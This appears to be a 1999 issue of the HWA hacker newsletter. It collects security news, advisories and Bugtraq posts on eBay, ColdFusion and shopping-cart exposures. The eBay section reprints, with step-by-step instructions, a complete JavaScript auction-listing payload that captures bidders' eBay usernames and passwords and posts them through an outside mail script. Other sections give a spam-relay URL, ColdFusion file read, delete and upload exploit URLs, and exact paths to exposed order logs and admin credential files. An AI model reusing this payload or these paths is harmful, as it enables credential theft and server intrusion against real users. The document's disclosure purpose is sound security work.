~~~~~~~~~~~~~~~

from: http://www.because-we-can.com/ebayla/default.htm

contributed to HWA by BHZ

THE EBAYLA BUG AND HOW TO PROTECT YOURSELF

This page describes a security problem that Blue Adept discovered with eBay's
on-line auctions on March 31, 1999 (realaudio interview). The security hole allows
eBay users to easily steal the passwords of other eBay users. The exploit involves
posting items for bid that include malicious javascript code as part of the item's
description. When an unsuspecting eBay user places a bid on the item, the
embedded javascript code sends their username and password to the malicious
user by e-mail. From the victim's point of view, nothing unusual seems to have occured,
so they are unlikely to report/complain to
eBay.

Once a malicious user knows the username/password of the victim's eBay account, she can
assume full control of the account, including the ability to:

o create new auctions (automtically charging the victim's account)
o place bids in the victim's name,
o retract legitimate bids in the victim's name,
o change the victim's username/password, barring them from eBay,
o associate bogus negative/positive comments with an arbitrary seller,
o prematurely close an auction being run by the victim.
o insert the ebayla code into the victim's auction.
(The code could be altered to do this automatically, which would constitute an ebayla virus).

The security problem is dangerously easy to take advantage of. A malicious user needs only
to embed the javascript code into their description of an item for auction. A walk-through of
the exploit demonstrates step-by-step how any user can steal eBay passwords.

Blue Adept notified eBay that a 'huge' potential security problem existed on March 31,1999
and offered assistance (but as of April 18, 1999 has only received form letter
KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly
available to speed the process of fixing the security hole.

TRY THE EBAYLA BUG DEMO ON YOURSELF!

Visit a working demonstration of this exploit at eBay! The demo works with any javascript-enabled
browser, such an Netscape or Internet Explorer. Users must register (free) with eBay to place bids.

** The demo is Blue Adept's own auction infected with eBayla code. WARNING! When you bid on this
item (or even just review your bid without placing it), your username and password will
automatically be mailed back to because-we-can.com.



HOW TO PROTECT YOURSELF

Unfortunately, the potential security issues at eBay are difficult to spot and avoid. If you are
unfamiliar with spotting suspect javascript in the docsource of an html document, the best way to
protect yourself may be to avoid using eBay until adequate html filters have been implemented.




THE EBAYLA BUG WALK-THROUGH

This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and
passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit
is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a
malicious user can aquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl
script, visit the the live demo at eBay.)

INGREDIENTS:

1 Computer with Internet Access
1 email account

STEP 1:
Visit ebay.com and register for a free user account.

STEP 2:
Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the following
description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords
are to be sent.

1 car, comes with windows. crashes frequently. toy.<hr>

WARNING do not bid on this item!! This auction is a demonstration of the
<a href="ebayla">http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.
If you place/review a bid, your username and password will be mailed to
http://www.because-we-can.com.


<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
document.open();
document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();');
document.writeln('}');
document.writeln('</scr' + 'ipt>');
document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">');
document.writeln('</frameset>');
document.close();
}

function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug!
for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1);
switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
default: outStr += aChar;
}
}
return outStr.substring(1, outStr.length);
}

function newaction(){
window.document.forms[0].action="javascript:ebayla()";
}

function ebayla(){
item = urlEncode(window.document.forms[0].item.value);
username = urlEncode(window.document.forms[0].userid.value);
password = urlEncode(window.document.forms[0].pass.value);
maxbid = urlEncode(window.document.forms[0].maxbid.value);

bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
+ "&pass=" + password + "&maxbid=" + maxbid;
place_bid = bid_script + bid_query_string;

mailscript = "http://204.225.88.132/cgi-bin/form1";
mailUrl = mailscript + '?|' + recipient;
printframeset(place_bid, mailUrl, username, password);
}

if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
setTimeout("newaction()", 1000);
}

</script>


STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the
user's username and password.

Note:
In the exploit described above, the part of the program that does the actual "dirty-work" of
mailing the password and username is a randomly chosen server-side mailing script we
found on the web. There are many equivalent and publicly available server-side mailing
programs that can be used in it's place.



@HWA
16.0 Cool security in Dutch PTT site allows users to send anonymous spam
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by [p] on IRC
http://www.ptt-telecom.nl/9267100/h/reageer.htm

If you use the following line you can send a message to anyone anonymously

http://www.ptt-telecom.nl/cgi-bin/r267100_ip?ip_email=user@pine.nl&onderwerp=hey%20paardelul&B11_bericht=gksdagyudsykgdjksg

onderwerp = subject
B11_bericht = message

@HWA

17.0 Cold Fusion vulnerability, thousands of sites exposed to danger.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Via HNN and The l0pht Advisories.

Release Application Platforms Severity

04/20/99 Cold Fusion 3 and 4 All Remote users can upload, download and modify any file on
the web server

Author: kklinsky@themerge.com



There is a security problem with installations of Cold Fusion Application Server
when the online documentation is installed. The online documentation is installed
by default. The vulnerability allows web users to view, delete, upload and potentialy
execute files anywhere on the server.

On February 4, 1999, Allaire posted a fix on their web site (www.allaire.com) and also
recommend that documentation not be stored on production servers. They also acknowledge
that the hole allows web users to read and also delete files on the server but not upload
or execute them. The patch successfully fixes the problem if you decide to keep the
documentation on the server.


Advisory from the l0pht follows;

L0pht Security Advisory
-------------

URL Origin: http://www.l0pht.com/advisories.html
Release Date: April 20th, 1999
Application: Cold Fusion Application Server
Severity: Web users can download, delete and even upload
executable files to a Cold Fusion server. Access
is not limited to files under the web root.
Author: kklinsky@themerge.com
Operating Sys: All platforms

-------------


I. Description

In issue 54, volume 8 of Phrack Magazine dated December 25, 1998,
rain.forest.puppy <rfpuppy@iname.com> describes a security problem with
installations of Cold Fusion Application Server when the online
documentation is installed. The online documentation is installed by
default. According to Phrack, the vulnerability allows web users to view
files anywhere on the server.

On February 4, 1999, Allaire posted a fix on their web site
(www.allaire.com) and also recommend that documentation not be stored
on production servers. They also acknowledge that the hole allows web
users to read and also delete files on the server. The patch
successfully fixes the problem if you decide to keep the documentation
on the server.

In examining an unpatched Cold Fusion Application Server it became
apparent that in addition to reading and deleting files, web users also
have the ability to upload (potentially executable) files to the server.

A cursory survey of many large corporate and e-commerce sites using Cold
Fusion turned up many vulnerable servers. The purpose of this advisory is
to stress how important it is to use the patch that Allaire provides or
take other measures to prevent web users from accessing this security
hole.


II. Details

By default, the Cold Fusion application server install program installs
sample code as well as online documentation. As part of this collection
is a utility called the "Expression Evaluator". The purpose of this
utility is to allow developers to easily experiment with Cold Fusion
expressions. It is even allows you to create a text file on your local
machine and then upload it to the application server in order to
evaluate it. This utility is supposed to be limited to the localhost.

There are basically 3 important files in this exploit that any web user
can access by default: "/cfdocs/expeval/openfile.cfm",
"/cfdocs/expeval/displayopenedfile.cfm" and "/cfdocs/expeval/exprcalc.cfm".
The first one lets you upload a file via a web form. The second one saves
the file to the server. The last file reads the uploaded file, displays
the contents of the file in a web form and then deletes the uploaded file.

The Phrack article and the advisory from Allaire relate to "exprcalc.cfm".
A web user can choose to view and delete any file they want. To view and
delete a file like "c:\winnt\repair\setup.log" you would use a URL like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

This exploit can be taken a step further. First go to:
http://www.server.com/cfdocs/expeval/openfile.cfm

Select a file to upload from your local machine and submit it. You will
then be forwarded to a web page displaying the contents of the file you
uploaded. The URL will look something like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt

Now replace the end of the URL where it shows ".\myfile.txt" with
"ExprCalc.cfm". Going to this URL will delete "ExprCalc.cfm" so that web
users can now use "openfile.cfm" to upload files to the web server
without them being deleted. With some knowledge of Cold Fusion a web user
can upload a Cold Fusion page that allows them to browse directories on
the server as well as upload, download and delete files. Arbitrary
executable files could placed anywhere the Cold Fusion service has
access. Web users are not restricted to the web root.

Frequently, Cold Fusion developers use Microsoft Access databases to
store information for their web applications. If the described
vulnerability exists on your server, these database files could
potentially be downloaded and even overwritten with modified copies.

The most concerning aspect of this vulnerability is that with a text
editor and a web browser, web users are able to download password files,
other confidential information and even upload executable files to a web
server.

III. Solution

Allaire has posted a patch to this vulnerability. This is currently
available at:
http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
In addition to this, it is recommended that the documentation and
example code not be stored on production servers.

For specific questions about this advisory, please contact
kklinsky@themerge.com



---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------



sample app to upload and download files: (this link appeared to be broken
when I tried it, maybe you'll have better luck)
http://www.l0pht.com/advisories/mole.cfm

patch from Allaire:
http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full


Allaire Security Bulletin (ASB99-01)
Expression Evaluator Security Issues

Originally Posted: February 4, 1999

Summary
One of the sample applications installed with ColdFusion Server, the
Expression Evaluator, exposes the ability to read and delete files on the
server. Allaire has released a patch that will limit access to the Expression
Evaluator to page requests made from the machine where it is installed. As
an additional measure of protection, Allaire recommends that customers not
install (or remove existing) documentation, sample code, example
applications and tutorials on production servers and secure access to these
files on workstations.

Issue
A range of sample code and example applications are provided with
ColdFusion Server to assist customers in learning and using the product.
Among these is an application called the Expression Evaluator, which is
installed in the //CFDOCS/expeval/ directory. The Expression Evaluator lets
users process expressions such as 1 + 1 to see how ColdFusion
expression evaluation works.

Used normally, the application is restricted to access from the local
machine based on the 127.0.0.1 IP address. However, some pages in the
Expression Evaluator can be accessed directly, exposing the ability to read
and delete files anywhere on the server where the evaluator is installed.

Affected Software Versions

Cold Fusion Application Server 2.0 (all editions)
Cold Fusion Application Server 3.0 (all editions)
Cold Fusion Application Server 3.1 (all editions)
ColdFusion Server 4.0 (all editions)


What Allaire is Doing
Allaire has released a patch that modifies the Expression Evaluator so that
all the pages in the Evaluator are restricted to access from the local
machine where the Expression Evaluator is installed based on the 127.0.0.1
IP address.

Download - ColdFusion Expression Evaluator Security Patch (Windows NT)
Download - ColdFusion Expression Evaluator Security Patch (Solaris)

What Customers Should Do
Customers should run the patch on all of their systems where the
Expression Evaluator is installed.

Furthermore, we recommend that customers remove (or not install in the
first place) all documentation, sample code, example applications, and
tutorials from production servers (e.g. servers accessible by end users via
the Internet, intranets or extranets). The CFDOCS directory should be
secured on developer workstations. The examples that are installed with
ColdFusion are installed in the CFDOCS directory, which is normally
installed in the root Web server directory. These examples can be removed
by deleting the CFDOCS directory. Instead of deleting these files, the entire
CFDOCS directory can be secured with standard Web server security.

Revisions
February 4, 1999 -- Bulletin first released.

Reporting Security Issues
Allaire is committed to addressing security issues and providing customers
with the information on how they can protect themselves. If you identify what
you believe may be a security issue with an Allaire product, please send an
email to secure@allaire.com. We will work to appropriately address and
communicate the issue.

Receiving Security Bulletins
When Allaire becomes aware of a security issue that we believe significantly
affects our products or customers, we will notify customers when
appropriate. Typically this notification will be in the form of a security bulletin
explaining the issue and the response. Allaire customers who would like to
receive notification of new security bulletins when they are released can sign
up for our security notification service.

For additional information on security issues at Allaire, please visit the
Security Zone at:
http://www.allaire.com/security

THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION
OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT,
INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED
OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE
EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL
DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.



@HWA

18.0 Privacy at risk in e-commerce rush
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Privacy at risk in e-commerce rush
By Troy Wolverton
Staff Writer, CNET News.com
April 21, 1999, 11:25 a.m. PT
URL: http://www.news.com/News/Item/0,4,35451,00.html

As small businesses rush to sell on the Internet, many shop owners lacking technical expertise--and the Web developers and hosting services that create their
sites--have unwittingly exposed customer information, including names, addresses, and full credit-card numbers.

At least 100 small sites have exposed this information, CNET News.com has learned. One of them is Florida-based Knox Nursery, which launched Home
Gardener Direct in February and was unaware it was revealing customer order data on insecure Web pages when contacted by CNET News.com last week.
"You've caught us with our pants down," said Rick Grossman, sales manager at GrowerNet, which designed Home Gardener Direct. "We've never had a security
problem before."

Home Gardener Direct's security breach was discovered by Joe Harris, a systems administrator at Blarg Online Services, a Bellevue, Washington-based Internet
service provider. Harris was investigating a problem on a client's site last week and searched the Internet for other similarly configured sites, using search terms such
as "index" "parent" "order" and "log." What he found were more than 100 sites, using various types of shopping cart technology, exposing the same types of
information.

The breaches are just the latest in a series of recent privacy and security problems on the Web. But unlike earlier problems, which affected large companies such as
Yahoo, Nissan, Excite and AT&T, the latest ones are both more widespread and affect much smaller companies.

The problem, analysts say, is that few small businesses understand the complexities of setting up a Web storefront. Although merchants say they are concerned about
customers' security, they often don't have the technical expertise to guarantee it. Lacking that expertise, small businesses are turning to Web designers and service
providers who may be just as ill-prepared to set up secure e-commerce sites.

Security "is probably a small concern in the back of their minds," said David Kerley, Web technology analyst at Jupiter Communications.

According to International Data Corporation, the number of small business Web pages doubled last year from 600,000 at the end of 1997 to 1.2 million at the end
of 1998. That represents some 17 percent of all small businesses.

Without technical knowledge, Kerley said, small businesses find it difficult to oversee the security of their sites, and many companies don't even know which
questions to ask.

"I think it's a huge challenge for the small- to medium-size company who can't afford the expertise in-house," Kerley said.

But entrepreneurs, lured by the promise of reaching new customers online, feel they can't afford not to have a Web presence. Mark Stone, the owner of Stoie's
StoGies, has been selling cigars on the Internet for two years as a way to get repeat business from tourists who visit his brick-and-mortar shop in San Francisco's
Fisherman's Wharf.

"The Web store is a nice complement to customers who don't live in the Bay Area," Stone said.

Stone, whose site was also recently discovered to be revealing order information, found his hosting service, US1Internet, in the Yellow Pages. He said the ISP had
done a "good job" of hosting his store, keeping him updated on the site and making needed changes. Security concerns are "not something that has come up," Stone
said.

Small Web merchants aren't only ones who lack the expertise to ensure security. Many site designers have little experience designing retail sites and may not know
how to protect private information. Home Gardener Direct, for instance, was the first e-commerce site that GrowerNet designed, according to Grossman.

Ray Boggs, an analyst with IDC, compared small business' hurry to begin selling on the Web to California's Gold Rush. During the Gold Rush, Boggs said, those
who got rich provided tools to the miners, and many Internet companies see a similar opportunity in providing e-commerce tools to small businesses.

"It's the ideal entrepreneurial environment," Boggs said. "It really does point to the hyper-evolving nature of the market and the Wild West nature of the market."

Although none of the small-business sites directly linked to the information and no stolen credit card numbers have been reported, the breach is still a significant one,
according to Deirdre Mulligan, staff counsel at the Center for Democracy and Technology.

"All it takes is one person to wreak havoc," Mulligan said.

Extropia, a Web developer that created the WebStore shopping cart software used by many of the affected sites, blamed site administrators and store owners for
configuring the software incorrectly and exposing customer information.

"They're really excited and they don't want to take the time to make the store right," said Extropia president Eric Tachibana. "To a certain degree, I empathize with
them. These people don't want to computer program, they want to sell stuff."

@HWA



18.1 CC numbers left vulnerable by many shopping cart programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/ April 21st

Numerous Sites Expose CC Data


contributed by Silicosis
Numerous commercial and freeware shopping carts when
installed incorrectly result in the possible exposure of
customer information. Information exposed may include
Name, CC Numbers, home address, phone number, what
they ordered, how much they paid etc. The
e-commerce software creates world readable files in the
web server's document tree which then get indexed by
numerous search engines.


BUGTRAQ;

Shopping Carts exposing CC data

Joe (joe@GONZO.BLARG.NET)
Mon, 19 Apr 1999 20:05:18 -0700


Tomorrow ( April 20 1999 ) CNet's news.com should be running a story
regarding various commercial and freeware shopping carts that, when
installed incorrectly or when installed by amateurs, result in the
possible exposure of customer information... and not just a few digits of
a credit card number like Yahoo's latest goof - everything is exposed.
Name, CC Numbers, home address, phone number, what they ordered, how much
they paid etc etc etc.

These various shopping carts create world readable files in the web
server's document tree which have subsequently been indexed by numerous
search engines. (If a cold chill didn't just run down your spine, please,
check your pulse)

To access this order information you need a search engine and a little
knowledge of how these various shopping carts are structured. Since some
are freeware and the commercial carts have downloadable demos, this is
trivial information to obtain.

This email is a heads up to system administrators and hosts. These
exposed order files were found by common search engine techniques and I
suspect that after this story hits, those files are going to be even more
vulnerable than they already are.

If your users have 3rd party shopping carts installed on your servers,
please run an audit on the files they generate and maintain. Any
clear-text order information available to or stored in your web servers
document tree should be immediately removed or have their access
restricted. This is common sense to most of us here however, like most
hosts, we don't always know what security nightmares our users have
created for us and for themselves.

I am hesitant to list the shopping carts that I've found to be exposing
information, for fear of giving too much information to the wanna-be
thieves out there. Please contact me directly if you want specifics. The
list is very short, however, about 100 exposed installations of these
carts have already been found and there are undoubtably hundreds more that
I haven't found. Some of these sites are doing a great deal of business
and some are doing none at all - but all of them are exposing order
information. On one site alone was enough data to allow a thief to live
like a king. (Until the FBI caught up with them that is :)

A side note: Before anyone screams about us not contacting these CGI
authors - Because of the sheer number of installations and the number of
vendors involved, taking this to each one of them would have been
prohibitive. We did have a conversation with one (fairly large)
commercial vendor (who shall remain nameless) and if the response we got
from them was any indication, contacting the remaining vendors would have
been futile. This particular vendor couldn't see the problem we had with
the software that -they themselves- had installed on behalf of our mutual
client. They couldn't understand why we told them to change their
software or remove it from the server, even after a long and patient
explanation of a little thing called 'liability'. Their tech told me last
Wednesday that their engineer would contact us to address these issues -
which as of this writing hasn't happened. (Not that I expected one - we
had to explain "world readable" to their rep 3 times and I'm still not
sure he really understood why this was such a Bad Idea (tm).)

We also tried to get the various CC companies involved in this and to be
blunt, they practically begged us to go away. This is fairly odd since
they are the ones that take the financial hit if these data files are
exposed. Visa Fraud's only recommendation to us was to "send a letter to
the FTC and let them deal with it". Sorry, but red tape like that is best
cut with the press, and they can get a much faster and more effective
response from the various vendors than a modest sized ISP in Seattle can.

My apologies for the late notice... and now for the standard
disclaimer:

Opinions expressed here are my own and not neccessarily that of my
employer.

Cheers.

Joe.

--
Joe H. Technical Support
General Support: support@blarg.net Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net

Re: Shopping Carts exposing CC data

Joe (joe@GONZO.BLARG.NET)
Tue, 20 Apr 1999 13:34:57 -0700


My apologies for the canned response, but I'm getting an email request for
specifics on this mess averaging 1 per minute - so I'll post this to the
list.

To answer many questions all at once:

CNet has not posted the story yet. (This is a good thing) More time to
minimize the damage...

The larger ECommerce sites usually write their stuff in house. As such,
places like Onsale.com, Amazon.com etc are not, to my knowledge,
vulnerable in the least. The ones you need to concern yourself with are
those that purchase 3rd party shopping systems and then install them
incorrectly. From what I've been able to gather, it's the smaller
mom-n-pop operations that are causing the most damage.

If a cart is not listed here, it should not be considered vulnerable in
the slightest. I myself have no problem doing business with Amazon,
Onsale, SurplusAuction, UBid, Buy.com et al. This doesn't mean you
shouldn't check your own installs though.

It would perhaps be prudent for ECommerce sites to reveal their
architecure and security scheme within their privacy statements. I for
one would like to hear them all say "No un-encrypted data stored on
servers - period." (This is our own policy) Hell, something as simple as
a 1024b PGP scheme with off-net private keys would make me deliriously
happy.

Please don't ask me if your particular cart is "vulnerable". Check for
yourself, since ALL of the carts listed below CAN be secured and are
usually only exposing data when the end user fsks up the install. Simply
check all files that contain customer data (order.log etc..) and see if
it's available to a web browser. You should already have the path to it,
so plug in the url to that file, if it comes up, you got problems.

It should be noted that these are not "bugs" in the common vernacular,
just improperly installed/maintained carts.

Under NO circumstances should any of the carts listed below be
blacklisted or considered unsafe. Quite the contrary. Many of the carts
listed below provide PGP options that would completely eliminate this
problem. Sadly, too few cart users are utilizing these options and
instead are taking the path of least resistance.

Here are the six shopping carts that, when installed contrary to their
documentation or are improperly maintained can expose order information.
All of the exposed information generated by these carts was discovered
through a public search engine.

Selena Sol's WebStore 1.0 http://www.extropia.com/
Platforms: Win32 / *Nix (Perl5)
Executable: web_store.cgi
Exposed Directory: Admin_files
Exposed Order info: Admin_files/order.log
Status: Commercial ($300)/ Demo available.
Number of exposed installs found: 100+
PGP Option available?: Yes

Order Form v1.2 http://www.io.com/~rga/scripts/cgiorder.html
Platforms: Win32 / *Nix (Perl5)
Executable: ?
Exposed Directory: Varies, commonly "Orders" "order" "orders" etc..
Exposed Order Info: order_log_v12.dat (also order_log.dat)
Status: Shareware ($15/$25 registration fee)
Number of exposed installs found: 15+
PGP Option available?: Unknown.

Seaside Enterprises EZMall 2000 http://www.ezmall2000.com/
Platforms: Win32 / *Nix (Perl5)
Executable: mall2000.cgi
Exposed Directory: mall_log_files
Exposed Order Info: order.log
Status: Commercial ($225.00+ options)
Number of exposed installs found: 20+
PGP Option Available?: YES

QuikStore http://www.quikstore.com/
Platforms: Win32 / *Nix (Perl5)
Executable: quikstore.cgi
Exposed Order info: quikstore.cfg* (see note)
Status: Commercial ($175.00+ depending on options)
Number of exposed installs found: 3
PGP Option Available?: Unknown.

NOTE: This is, IMHO, one of the most dangerous of the lot, but
thankfully, one of the lowest number of discovered exposures. Although
the order information itself is secured behind an htaccess name/pwd
pair, the config file is not. The config file is world readable, and
contains the CLEAR TEXT of the ADMINS user id and password
- rendering the entire shopping cart vulnerable to an intruder.
QuikStore's "password protected Online Order Retrieval System" can be
wide open to the world. (Armed with the name and pwd, the web visitor
IS the administrator of the shopping cart, and can view orders, change
settings and order information - the works.)


PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/
Platforms: Win32 / *Nix (C/C++(?))
Executable: shopper.cgi
Exposed Directory: PDG_Cart/ (may differ between installs)
Exposed Order info: PDG_Cart/order.log
Exposed Config info: PDG_Cart/shopper.conf (see note)
Status: Commercial ($750+ options)
Number of exposed installs found: 1+ (They installed it on our server)
PGP Option Available?: Unknown. (Couldn't get a yes or no outta them)

NOTE: if they renamed the order log, shopper.conf will tell you where
it's at and what it was named - worse, shopper.conf exposes the clear
text copy of Authnet_Login and Authnet_Password, which gives you full
remote administrative access to the cart. shopper.conf, from what I can
determine based on the company installed version we have here, is world
readable and totally unsecured.

And now a drum roll please:

Mercantec's SoftCart http://www.mercantec.com/
Platform: Win32 (*Nix?)
Executable: SoftCart.exe (version unknown)
Exposed Directory: /orders and /pw
Exposed Order Info: Files ending in "/orders/*.olf"
Exposed Config Info: /pw/storemgr.pw
(user ID and encrypted PW for store mgr?)

Number of exposed installs: 1
PGP Option Available?: Unknown
NOTES:

This one has only been found vulnerable on ONE server. (user error?) The
encryption scheme on the storemgr.pw password is unrecognized by me but
I'm not an encryption guru. Someone's bound to recognize it.

This is a scary one though - HiWay technologies is one of the largest
domain hosts in the world, with over 120,000 domains. They are using
SoftCart for clients that request ECommerce capabilities.

The exposed install I found is hosted by HiWay.

*shudder*

Any and all opinions expressed here are solely those of the author and
do not reflect the views, policies, practices or opinions of my employer.

Joe.

--
Joe H. Technical Support
General Support: support@blarg.net Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net


@HWA

18.2 E-tailers scramble to fix security holes.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.news.com/News/Item/Textonly/0,25,35559,00.html


E-tailers scramble to fix security holes
By Troy Wolverton
Staff Writer, CNET News.com
April 22, 1999, 5:45 p.m. PT
URL: http://www.news.com/News/Item/0,4,35559,00.html

As reports come to light of security breaches exposing customer order data on dozens of e-commerce sites, software programmers and computer technicians are
scrambling to tell customers how to solve the problems.

But despite their efforts, some sites are still exposing customer names, addresses, and credit card numbers. This afternoon, CNET News.com found seven sites
whose order logs were still exposed.

Joe Harris, a computer technician in Bellevue, Washington, discovered the breaches last week on some 130 e-commerce Web sites. The problems stem from sites
that place unencrypted order logs in publicly accessible directories. Sites can close the breach by encrypting the logs, placing the logs in password-protected
directories, or both.

Software vendors say Web designers and Web host are to blame for the breaches, even though many took steps Thursday to help their customers close their
security holes.

More than 100 of the sites found to have the security breach were using Extropia's WebStore software. Extropia president Eric Tachibana posted a note today on
the company's homepage warning WebStore users about the problem.

Tachibana, who is also know by his programming name Selena Sol, said he planned to follow that up by sending email to Extropia's mailing list describing the breach
and detailing several fixes to the problem. He said he also planned to track down Web sites with the breach and send them the same information.

"I figure that NONE of the bad store admins will contact me about it, because if they were the kind of people who would contact me, they would be the kind of
people who would have done it right," Tachibana wrote in an email.

Tachibana said there are "several thousand" copies of WebStore installed on the Web.

Harris found more than 15 Web sites using Merchant OrderForm with security breaches. Russell Alexander, who wrote the program, said he planned to send a
notice about the problem and a fix to his 300-400 registered users this weekend.

Although Merchant OrderForm does not have encryption built into it, Alexander said the program includes instructions on how to secure the order logs. He said that
normally the logs are turned off, meaning that no customer data is collected in the order file.

"The best thing to do is to just not turn on the log files," Alexander said.

While Tachibana and Alexander were simply notifying users of the problem and providing fixes, Rick Hoelle spent 20 hours writing an update to his company's
QuikStore program. Although Harris said he only found three breaches in the QuikStore software, he called it "one of the most dangerous of the lot."

According to Harris, the QuikStore installations exposed a configuration file from which Web users could find the system administrator's user name and password.
That information could then be used to hack the site, not only allowing users to view sensitive files, but to change and delete them as well.

Hoelle said he had already sent QuikStore's registered users an update that would encrypt the user names and passwords. He said a subsequent update would also
encrypt log files. Saying that he had already posted information about the breach on a company bulletin board, Hoelle added that planned to update the program's
documentation as well.

"We know that we have a responsibility to fix this for our customers and their customers," Hoelle said.

Harris, who discovered the problem last week, sent out an initial message concerning the breaches on the Bugtraq listserv on Monday. Harris, a computer technician
at Blarg Online Services in Bellevue, Washington, followed that up with a more detailed message to the list on Tuesday, documenting the programs affected, the
number of sites using those programs that had breaches, and the files exposed.

Harris said he wanted to alert as many Web hosts and software vendors as possible about the problem so that he wouldn't happen again. Harris said he was not
surprised how the vendors have reacted.

"The last thing that people want to do is kill the golden goose that is e-commerce," Harris said.



Copyright © 1995-99 CNET, Inc. All rights reserved. Privacy policy.

@HWA

19.0 Got lots of time and computing power on your hands?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Via HNN April 21st http://www.hackernews.com/

$50K for the Next Prime Number

contributed by Silicosis
The Electronic Frontier Foundation is offering $50k to
the first person to find a prime number with one million digits.

The Electronic Frontier Foundation
http://www.eff.org/coop-awards/prime-release1.html

The Great Internet Mersenne Prime Search
http://www.mersenne.org/prime.htm

@HWA

20.0 EU and US disagree on privacy laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Wired, seen on HNN

http://www.wired.com/news/news/politics/story/19232.html

US, EU Still Stuck on Privacy
by James Glave

3:00 a.m. 21.Apr.99.PDT
A US plan to protect consumer data falls far short of EU consumer privacy standards,
according to a European Union privacy expert.

The so-called "Safe Harbor" plan is too vague and lacks sanctions, said Fordham Law
School professor Joel Reidenberg.

The sticking points were revealed in the latest draft of the Safe Harbor proposal,
which was designed to allow stateside companies to do business across the Atlantic.

The European Union's Directive on Data Protection was enacted last fall to protect
European citizens from privacy invasions. The rules recommend penalties for European
nations that send data -- such as frequent flyer information or other marketing
information -- to countries that do not meet the criteria.

That concerns US Internet companies -- and other data-rich market sectors, such as
the airline industry -- which prefer a private-sector-driven, self-regulation approach
to consumer privacy.

In an effort to address the rules, undersecretary for international trade David Aaron
began negotiations with John Mogg of the European Union. Aaron proposed the Safe Harbor
standard to allow US companies to meet a certain level of compliance with the directive.

"What undersecretary Aaron purports that Safe Harbor will do is, I think, contrary to
the European political process and certain aspects of European data protection law,"
said Reidenberg.

But the latest draft of that proposal, released Monday, shows that Europe remains
unimpressed with two key aspects of the plan.

